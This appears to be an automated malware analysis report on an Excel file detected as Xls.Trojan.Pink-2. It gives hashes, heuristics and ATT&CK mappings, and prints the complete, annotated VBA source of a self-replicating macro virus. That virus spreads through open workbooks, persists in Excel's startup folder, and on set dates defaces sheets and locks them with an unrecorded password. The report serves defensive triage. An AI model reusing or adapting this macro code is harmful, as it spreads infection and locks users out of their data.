Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 35bee95d1797a701…

MALICIOUS

Office (OLE)

264.0 KB Created: 1996-12-17 01:32:42 Authoring application: Microsoft Excel First seen: 2015-10-03
MD5: da4038ce5200c08847737cfa21a57dc0 SHA-1: 8a29368ca004b52e6661801abbb4dec2a04288aa SHA-256: 35bee95d1797a701f5a732be7cea5eeac527de3d23c3701899855ed7e1970a79
88 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

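The file is an Excel document containing VBA macros, including an Auto_Open macro, which is a common technique for initial execution. The ClamAV detection 'Xls.Trojan.Pink-2' and the presence of VBA macros strongly suggest malicious intent, likely to download and execute further payloads. Note, however, that the extracted macro previewed below contains no download, network or process-execution calls: what it shows is a self-replicating macro virus that copies its own module into the active workbook, saves a copy of itself as B00k1.xls in Excel's startup path (Application.StartupPath) so that it loads with Excel, and on certain dates protects the active sheet with a random password that is not recorded anywhere. The startup-path copy corresponds to Office Application Startup persistence (T1137), which is not listed above. The macro attempts to hide its presence by renaming modules and manipulating workbook visibility, indicating a deliberate effort to evade detection.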

Heuristics 3

  • ClamAV: Xls.Trojan.Pink-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Pink-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub auto_open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4485 bytes
SHA-256: 6ac49b120d1b6cb8654406bd32290f418c112a95238fd2ad037162683052413c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "NV12910"

' Auto-run entry point: Excel runs a macro named auto_open when the workbook
' is opened. It does no work itself; it only registers "pink" as the
' application-wide OnSheetActivate handler, so the main routine runs the next
' time any sheet is activated.
Sub auto_open()
Application.OnSheetActivate = "pink"
End Sub
' Main routine of the sample. As visible in this listing it:
'   1. hides (and saves, if modified) an open workbook named "B00k1.xls";
'   2. copies its own module into the active workbook under a generated name;
'   3. runs date-triggered branches that protect or deface the active sheet;
'   4. saves a copy of this workbook as "B00k1.xls" in Excel's startup path.
' No network, shell or download call appears anywhere in the routine.
' Triage hint: the artefacts it leaves are a module named <letter>V<digits>
' and a file B00k1.xls (digit zeros, not the letter o) in the startup folder.
Sub pink()
    ' VBA applies "As <type>" only to the name directly before it: getname is a
    ' String and thisnum an Integer; every other name declared here is a Variant.
    ' namemo, used further down, is not declared at all (implicit Variant).
    Dim mn, virname, thismo, passwords, pick, pickmo, head, getname As String, i, j, k, num, wbc, thisnum As Integer
    wbc = Workbooks.count
    ' Look for an already-open "B00k1.xls"; if present, remember that in getname,
    ' hide its window and save it when it has unsaved changes.
    For k = 1 To wbc
    If Workbooks(k).Name = "B00k1.xls" Then
        getname = "B00k1.xls"
        Windows("B00k1.xls").Visible = False
            If Workbooks("B00k1.xls").Saved = False Then
                
                Workbooks("B00k1.xls").Save
            End If
        Exit For
     End If
    Next
    ' With fewer than two workbooks open there is no second workbook to copy
    ' into, so skip straight to the startup-path section.
    If wbc < 2 Then
        GoTo final
    End If
    thisnum = ThisWorkbook.Modules.count
    num = ActiveWorkbook.Modules.count
    ' Find this workbook's own module: the first one whose name has "V" as its
    ' second character (the previewed module is named "NV12910").
    For i = 1 To thisnum
        thismo = ThisWorkbook.Modules(i).Name
        pickmo = Right(Left(thismo, 2), 1)
        If pickmo = "V" Then
            namemo = ThisWorkbook.Modules(i).Name
            Exit For
        End If
    Next
    ' Build the name for the copied module: first character of the active
    ' workbook's name when it is an ASCII letter (a-z / A-Z), otherwise "N" ...
    If (Asc(ActiveWorkbook.Name) >= 97 And Asc(ActiveWorkbook.Name) <= 122) Or (Asc(ActiveWorkbook.Name) >= 65 And Asc(ActiveWorkbook.Name) <= 90) Then
        head = Chr(Asc(ActiveWorkbook.Name))
    Else
        head = "N"
    End If
    ' ... followed by "V", the current month, the day and the last two
    ' characters of Time$ (the seconds).
    mn = head & "V" & Month(Now) & Day(Now) & Right(Time$, 2)
    ' If the active workbook already has a module with "V" as second character
    ' (the shape of the names generated above), End stops all macro execution.
    ' Any unrelated module matching that pattern has the same effect.
    For j = 1 To num
        pick = Right(Left(ActiveWorkbook.Modules(j).Name, 2), 1)
        If pick = "V" Then
            End
        End If
    Next
        ' IV65536 is the last cell of a legacy .xls worksheet. Unless month + day
        ' equals 13, its formula is set to ="" when it is not that already.
        ' NOTE(review): the purpose is not evident from this listing (possibly a
        ' marker or a way to mark the workbook as changed) - confirm.
        If Month(Now) + Day(Now) <> 13 And ActiveSheet.Range("iv65536").FormulaR1C1 <> "=""""" Then
            ActiveSheet.Range("iv65536").FormulaR1C1 = "="""""
        End If
    ' Replication step: copy the sheet named namemo (the macro module found
    ' above) from this workbook into the active workbook, placed before the
    ' active sheet, then rename the copy to the generated name.
    ThisWorkbook.Sheets(namemo).Copy ActiveWorkbook.ActiveSheet
    ActiveWorkbook.Modules(namemo).Name = mn
    ' Empty branch: the condition is evaluated but nothing is done with it.
    If Left(ActiveWorkbook.Name, 4) <> "Book" Then
       
    End If
    Application.ScreenUpdating = False
    ' Random 8-character value used as the sheet-protection password below. It
    ' is not stored or displayed anywhere in this listing. Randomize is never
    ' called here, so Rnd runs from VBA's default seed.
    passwords = Left((Rnd * 1000000000 + 100000000), 8)
    ' Date trigger 1: month + day = 13 -> protect the active sheet.
    If Month(Now) + Day(Now) = 13 Then
    ActiveSheet.Protect DrawingObjects:=True, Contents:=True, Scenarios:=True, password:=passwords
    End If
    ' Date trigger 2: 15 June -> clear all cell formatting, shrink columns and
    ' rows, zoom out to 25 %, write "OO" into a fixed set of cells (a pattern
    ' drawn on the sheet), then protect the sheet with the random password.
    If Month(Now) = 6 And Day(Now) = 15 Then
      With Cells
   .ClearFormats
   .ColumnWidth = 2.75
   .RowHeight = 15
   End With
    ActiveWindow.Zoom = 25
    Union(Range( _
        "AO15,AP15,AO16,AP16,AO16,AO17,AP17,AO18,AP18,AO19,AP19,AO20,AP20,AO21,AP21,AO22,AP22,AO23,AP23,AO24,AP24,AO25,AP25,AO26,AP26,AO27,AP27,AO28,AP28,AO29,AP29,AO30" _
        ), Range( _
        "AP30,AO31,AP31,AN19,AM19,AL19,AK19,AJ19,AJ19,AI19,AH19,AG19,AG20,AH20,AI20,AJ20,AK20,AL20,AM20,AN20,AG18,AH18,AI18,AJ18,AK18,AL18,AM18,AN18,AQ18,AR18,AS18,AT18" _
        ), Range( _
        "AU18,AV18,AW18,AX18,AQ19,AR19,AS19,AT19,AU19,AV19,AW19,AX19,AQ20,AR20,AS20,AT20,AU20,AV20,AW20,AX20,AQ30,AR30,AS30,AT30,AU30,AV30,AW30,AX30,AQ31,AR31,AS31,AT31" _
        ), Range( _
        "AU31,AV31,AW31,AX31,AG21,AG22,AG23,AG24,AG25,AG26,AG27,AG28,AG29,AG30,AG31,AH21,AH22,AH23,AH24,AH25,AH26,AH27,AH28,AH29,AH30,AH31,AW17,AW16,AW15,AW14,AW14,AW13" _
        ), Range( _
        "AW12,AW11,AW11,AW10,AW9,AW8,AW7,AX7,AX8,AX9,AX10,AX11,AX12,AX13,AX14,AX15,AX16,AX17,AG6,AH6,AI6,AJ6,AK6,AL6,AM6,AN6,AO6,AP6,AW6,AX6,AG31,AG31" _
        ), Range( _
        "AG32,AH32,AO32,AP32,AQ32,AR32,AS32,AT32,AU32,AV32,AW32,AX32,AG7,AH7,AI7,AJ7,AK7,AL7,AM7,AN7,AO7,AP7,AG8,AH8,AI8,AJ8,AK8,AL8,AM8,AN8,AO8,AP8" _
        ), Range("AO9,AP9,AO10,AP10,AO11,AP11,AO12,AP12,AO13,AP13,AO14,AP14")) = "OO"
        ActiveSheet.Protect DrawingObjects:=True, Contents:=True, Scenarios:=True, password:=passwords
    ' Date trigger 3: month + day = 22 (checked only when it is not 15 June)
    ' -> protect the active sheet.
    ElseIf Month(Now) + Day(Now) = 22 Then
    ActiveSheet.Protect DrawingObjects:=True, Contents:=True, Scenarios:=True, password:=passwords
    End If
final:
    ' Persistence: Dir returns "" when no B00k1.xls exists in Excel's startup
    ' path. In that case a copy of this workbook is saved there under that name.
    virname = Dir(Application.StartupPath & "\B00k1.xls")
    If virname = "" Then
        ThisWorkbook.Sheets(2).Range("iv65536").FormulaR1C1 = "="""""
        ThisWorkbook.SaveCopyAs Filename:=Application.StartupPath & "\" & "B00k1.xls"
        ' getname is empty when no open workbook was named "B00k1.xls": the
        ' handler is then unregistered and End stops execution for this run.
        If getname = "" Then
            Application.OnSheetActivate = ""
            End
        End If
        ActiveWindow.Visible = False
    End If
    ' Re-point the sheet-activation handler at the pink macro of the copy in
    ' the startup path.
    Application.OnSheetActivate = Application.StartupPath & "\" & "B00k1!pink"
End Sub


' Attribute header of the workbook's document module ("ThisWorkbook").
' No procedure code follows it in this preview; the macro code shown on this
' page sits in the module named "NV12910".
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True